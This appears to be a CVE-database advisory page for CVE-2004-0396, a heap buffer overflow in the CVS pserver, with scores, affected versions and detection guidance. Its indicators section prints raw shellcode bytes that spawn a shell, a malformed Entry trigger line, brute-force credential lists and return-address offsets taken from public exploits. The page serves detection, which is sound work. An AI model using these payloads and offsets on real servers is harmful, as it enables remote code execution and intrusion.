cbcvebase.
CVE-2004-0396
published 2004-06-14

CVE-2004-0396: Heap-based buffer overflow in CVS 1.11.x up to 1.11.15, and 1.12.x up to 1.12.7, when using the pserver mechanism allows remote attackers to execute arbitrary…

PriorityP262high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
67.53%
99.2th percentile
Heap-based buffer overflow in CVS 1.11.x up to 1.11.15, and 1.12.x up to 1.12.7, when using the pserver mechanism allows remote attackers to execute arbitrary code via Entry lines.

Affected

7 ranges
VendorProductVersion rangeFixed in
cvscvs
cvscvs
cvscvs>= 0 < 1:1.12.5-61:1.12.5-6
cvscvs>= 0 < 1:1.12.5-61:1.12.5-6
cvscvs>= 0 < 1:1.12.5-61:1.12.5-6
cvscvs>= 0 < 1:1.12.5-61:1.12.5-6
debiancvs< cvs 1:1.12.5-6 (bookworm)cvs 1:1.12.5-6 (bookworm)

Detection & IOCsextracted from sources · hover to see the quote

port2401
commandEntry /CCCCCCCCC/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC/CCCCCCCCCCC
otherMAGICSTRING: abroxyou
otherABMAGIC: -AB-
bytes
\xeb\x15\x42\x4c\x34\x43\x4b\x48\x34\x37\x20\x34\x20\x4c\x31\x46\x33\x20\x42\x52\x4f\x21\x0a\x31\xc0\x50\x68\x78\x79\x6f\x75\x68\x61\x62\x72\x6f\x89\xe1\x6a\x08\x5a\x31\xdb\x43\x6a\x04\x58\xcd\x80\x6a\x17\x58\x31\xdb\xcd\x80\x31\xd2\x52\x68\x2e\x2e\x72\x67\x58\x05\x01\x01\x01\x01\x50\xeb\x12\x4c\x45\x20\x54\x52\x55\x43\x20\x43\x48\x45\x4c\x4f\x55\x20\x49\x43\x49\x68\x2e\x62\x69\x6e\x58\x40\x50\x89\xe3\x52\x54\x54\x59\x6a\x0b\x58\xcd\x80\x31\xc0\x40\xcd\x80
bytes
\x6a\x1b\x58\x31\xdb\xcd\x80\x85\xc0\x74\x42\x6a\x19\x58\x50\xcd\x80\x50\x6a\x17\x58\x50\xcd\x80\x68\x2d\x41\x42\x2d\x89\xe3\x6a\x04\x58\x50\x53\x6a\x01\x50\xcd\x80\x6a\x02\x6a\x01\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\x6a\x31\x58\xcd\x80\x93\x6a\x17\x58\xcd\x80\x6a\x04\x58\x6a\x01\x5b\x68\x2d\x41\x42\x2d\x89\xe1\x89\xc2\xcd\x80\xb0\x3f\x6a\x01\x5b\x6a\x02\x59\xcd\x80\x31\xc0\x99\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x00
bytes
\x21\x18\xd8\x58\xa0\x14\x23\x61\x90\x10\x20\x01\x92\x0b\x80\x0e\x94\x10\x20\x04\x82\x10\x20\x04\x91\xd0\x20\x08\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh
  • Monitor TCP port 2401 (CVS pserver) for malformed 'Entry' lines sent during authentication — the overflow is triggered via Entry lines in the pserver protocol.
  • Detect exploit traffic by looking for the magic marker string 'abroxyou' in CVS pserver (TCP/2401) traffic, used by the exploit to confirm shellcode execution.
  • Detect exploit traffic by looking for the marker string '-AB-' written to stdout by the xx_shellcode payload, indicating successful exploitation.
  • Detect heap-spray/normalization phase: large numbers of 'Entry' lines with repeated 0x41/0x42/0x43 fill bytes sent over CVS pserver prior to the overflow.
  • Exploit uses 'Gzip-stream 1' compression negotiation immediately before triggering the overflow; detect anomalous Gzip-stream requests on CVS pserver sessions that also contain oversized Entry lines.
  • Exploit brute-forces common anonymous CVS credentials (user: anonymous/anoncvs/cvs/guest; pass: empty/anonymous/anoncvs) and common cvsroot paths; alert on rapid sequential AUTH REQUEST attempts with these credentials.
  • ·Affected versions are CVS 1.11.x through 1.11.15 and 1.12.x through 1.12.7 only; the vulnerability requires the pserver mechanism to be enabled.
  • ·The Linux exploit (exploit-db 300) attempts OS fingerprinting before choosing between Linux and BSD exploitation paths; detection rules should cover both code paths.
  • ·The Solaris/SPARC exploit (exploit-db 301) targets specific CVS binary offsets per version; retaddr values differ per target (e.g., 0xd4cc8 for cvs-1.11.1p1 Solaris9/SPARC, 0xd7ae8+8192 for cvs-1.12.2 Solaris9/SPARC).

CVSS provenance

nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5HIGH
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.